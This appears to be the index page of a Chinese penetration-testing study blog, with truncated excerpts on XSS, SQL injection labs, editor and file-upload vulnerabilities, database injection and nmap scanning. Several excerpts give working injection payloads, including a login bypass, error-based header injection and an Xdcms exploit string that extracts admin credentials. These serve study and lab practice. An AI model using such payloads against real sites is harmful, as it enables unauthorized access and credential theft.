Putdownd’s Blog

XSS跨站脚本 XSS是指攻击者在网页中嵌入客户端脚本，通常是JavaScript编写的恶意代码，当用户使用浏览器浏览被嵌入恶意代码的网页时，恶意代码将会在用户的浏览器上执行。 XSS攻击是在网页中嵌入客户端恶意脚本代码，这些恶意代码一般是使用JavaScript语言编写的（也有使用ActionScript、.VBScript等客户端脚本语言编写的，但较为少见）。所以，如果想要深入研究XSS，必须要精通JavaScript。JavaScript能做到什么效果，XSS的威力就有多大。 JavaScript可以用来获取用户的Cookie、改变网页内容、URL调转，那么存在XSS漏洞的网站，就可以盗取用户Cookie、黑掉页面、导航到恶意网站，而攻击者需要做的仅仅是向Web页面中注入JavaScript代码。 主要分为三种类型： 反射型 存储型 DOM 型 XSS 危害 盗取 Cookie 盗取账户 恶意软件下载 键盘记录 钓鱼欺骗 XSS蠕虫 广告引流等等 JavaScript 能够写出的任意恶意功能 反射型 反射型XSS也被称为非持久性XSS，是现在最容易出现的一种XSS漏洞...

参考crow: https://github.com/crow821/crowsec less - 18 http头注入 浏览器插件ModHeader 通过修改User-Agent: 的值进行注入 原 : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 注入语句 : User-Agent: ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1 (报错注入) 后续通过更改构造语句获得其他的信息 1' or updatexml(1,concat(0x7e,构造语句)),1) and '1'='1 12345构造语句:查库： select schema_name from information_schema.schemata;查表： select table_name from information_s...

参考crow: https://github.com/crow821/crowsec Less-11 POST内容： uname=’ & passwd=1&submit=Submit 返回的结果显示你存在sql语法错误，证明存在注入漏洞。或这是直接在username中填写’，password中随便写判断一下是否存在注入漏洞。 直接在username中填写 admin’ or 1=1#（此处不能使用–+，因为–+主要使用在url中，#是适用的）即： 1uname=a' or 1=1 #& passwd=a &submit=Submit 此时登录成功，可以验证存在注入漏洞。3. 此时在password位置进行验证： 1uname=a&passwd=a' or 1=1# &submit=Submit 登录成功，开始构造！ 同样可以进行判断，最后得出一共有两列。 1uname=a' order by 3#&passwd=a &submit=Sub...

常见的文本编辑器有CKEditor、.Ewebeditor、UEditor、KindEditor、XHeditor等。这类编辑器的功能是非常类似的，比如都有图片上传、视频上传、远程下载等功能，这类文本编辑器也称为富文本编辑器 使用此类编辑器减少了程序开发的时间，但是却增加了许多安全隐患，比如：使用CKEditor编辑器有10万个树站，如果CKEditor爆出一个GetShell漏洞，那么这10万个网站都因此受到牵连。下面以FCKeditor编辑器为例，讲述文本编辑器漏洞。 FCK编辑器漏洞FCKeditor是一个开放源代码、所见即所得的文字编辑器，可以适用于ASP/PHP/ASPX/JSP等脚本类型网站. 注：FCKeditor现已改名为CKEditor。 FCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页1FCKeditor/_samples/default.html  查看编辑器版本1FCKeditor/_whatsnew.html  查看文件上传路径1fckeditor/edito...

文件上传漏洞Wb应用程序通常会有文件上传的功能，例如，在BBS发布图片、在个人网站发布ZP压缩包、在招聘网站上发布DOC格式简历等。只要Wb应用程序允许上传文件，就有可能存在文件上传漏洞。上传漏洞与SQL注射相比，其风险更大，如果Wb应用程序存在上传漏洞，攻击者甚至可以直接上传一个WebShell到服务器上。那么如何确认Wb应用程序是否存在上传漏洞呢？比如：我的网站是一个BBS论坛，由PHP语言编写，用户可以上传自己的个性头像，也就是图片文件，但文件上传时并没有对图片格式做验证，导致用户可以上传任意文件，那么这就是一个上传漏洞。 漏洞解析攻击者在利用上传漏洞时，通常会与Wb容器的解析漏洞配合在一起。常见的Web容器有IS、Nginx、Apache、Tomcat等，下面将以IIS、Apache容器为例讲解。 上传文件和文件执行是两个东西 漏洞分类:解析漏洞、cms漏洞、其他漏洞【编辑器漏洞、cve漏洞、安全修复】 思路：如果有一个网站，要从文件上传的方向开始第一步：先看中间件，看是否存在解析漏洞/CMS/编辑器漏洞/CVE/如果有，如...

各种提交方式注入的挖掘常见的提交方式1234567GETPOSTCOOKIEHEADPUTOPTION get注入12345678get注入比较常见例如：www.xxxx.com/new.asp?id=11&ssid=123&bid=55And 1=1And 1=2/ -0‘ %bf’“ POST注入post提交方式主要适用于表单的提交可能存在漏洞的位置：搜索框、登录、留言、注册挖掘的时候注入魔术引号 例如：www.cracerxxx.com/admin.php测试站点：http://testasp.vulnweb.com/login.asp?tfUPass=&tfUName= 测试工具pangolin sqlmapXdcms +burp注入 XDCMS全版本存在sql注入漏洞 需要使用代理抓包改包工具进行完成。 sql exp 1%60%3D%28select%20group_concat%28username%2C0x3a%2Cpassword%29%20from%20c_admin%20where%20id%3D1%29%23 COOK...

oracle数据库介绍Oracle数据库系统是美国ORACLE公司（甲骨文）提供的以分布式数据库为核心的一组软件产品。是目前世界上使用最为广泛的数据库管理系统。基于“客户端/服务器”模式结构，客户端应用程序与用户交互，接收用户信息，并向服务器发送请求，服务器系统负责管理数据信息和各种操作数据的活动。特点 支持多用户、大事务量的处理 数据安全性和完整性的有效控制 支持分布式数据处理 移植性强 Oracle 手工注入判断数据库 判断注入 12and 1=1and 1=2 判断oracle数据库 12and exists(select * from dual) and exists(select * from user_tables) 判断列数12order by 11 返回正常order by 12 返回错误 获取数据类型不匹配的列1http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,null,null,null,null,null,null,null,null...

Mysql 介绍MySQL是一个关系型数据库管理系统，由瑞典 MySQL AB 公司开发，目前属于 Oracle 旗下公司。MySQL 最流行的关系型数据库管理系统，在 WEB 应用方面 MySQL 是最好的 RDBMS (Relational Database Management System，关系数据库管理系统) 应用软件之一。MySQL 是一种关联数据库管理系统，关联数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。MySQL 所使用的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策（本词条“授权政策”），它分为社区版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型网站的开发都选择 MySQL 作为网站数据库。由于其社区版的性能卓越，搭配 PHP 和 Apache 可组成良好的开发环境。 常见的sql语句 说明：创建数据库 1CREATE DATABASE database-name 说明：删除数据库 1drop database dbname 说明：...

Sqlserver 介绍美国Microsoft公司推出的一种关系型数据库系统。SQLServer是一个可扩展的、高性能的、为分布式客户机/服务器计算所设计的数据库管理系统，实现了与WindowsNT的有机结合，提供了基于事务的企业级信息管理系统方案。其主要特点如下：（1）高性能设计，可充分利用WindowsNT的优势（2）系统管理先进，支持Windows图形化管理工具，支持本地和远程的系统管理和配置。（3）强壮的事务处理功能，采用各种方法保证数据的完整性。（4）支持对称多处理器结构、存储过程、ODBC，并具有自主的SQL语言。 SQLServer以其内置的数据复制功能、强大的管理工具、与Internet的紧密集成和开放的系统结构为广大的用户、开发人员和系统集成商提供了一个出众的数据库平台。 常用语句 说明：创建数据库 1CREATE DATABASE database-name 说明：删除数据库 1drop database dbname 查询所有： 12Select * from 表名select * from Student mssql数据库权限 sa...

端口扫描之王———-NMAP Nmap是一款非常强大的实用工具,可用于：检测活在网络上的主机（主机发现）检测主机上开放的端口（端口发现或枚举）检测到相应的端口（服务发现）的软件和版本检测操作系统，硬件地址，以及软件版本检测脆弱性的漏洞（Nmap的脚本）Nmap是一个非常普遍的工具，它有命令行界面和图形用户界面。本人包括以下方面的内容:介绍Nmap扫描中的重要参数操作系统检测Nmap使用教程Nmap使用不同的技术来执行扫描，包括：TCP的connect（）扫描，TCP反向的ident扫描，FTP反弹扫描等。所有这些扫描的类型有自己的优点和缺点，我们接下来将讨论这些问题。 Nmap的使用取决于目标主机,因为有一个简单的（基本）扫描和预先扫描之间的差异。我们需要使用一些先进的技术来绕过防火墙和入侵检测/防御系统，以获得正确的结果。 主机探测扫描单个主机 1nmap 192.168.1.2 扫描整个子网,命令如下: 1nmap 192.168.1.1/24 扫描多个目标,命令如下： 1nmap 192.168.1.2 192.168.1.5 扫描一个范围内的目标,如下： 1n...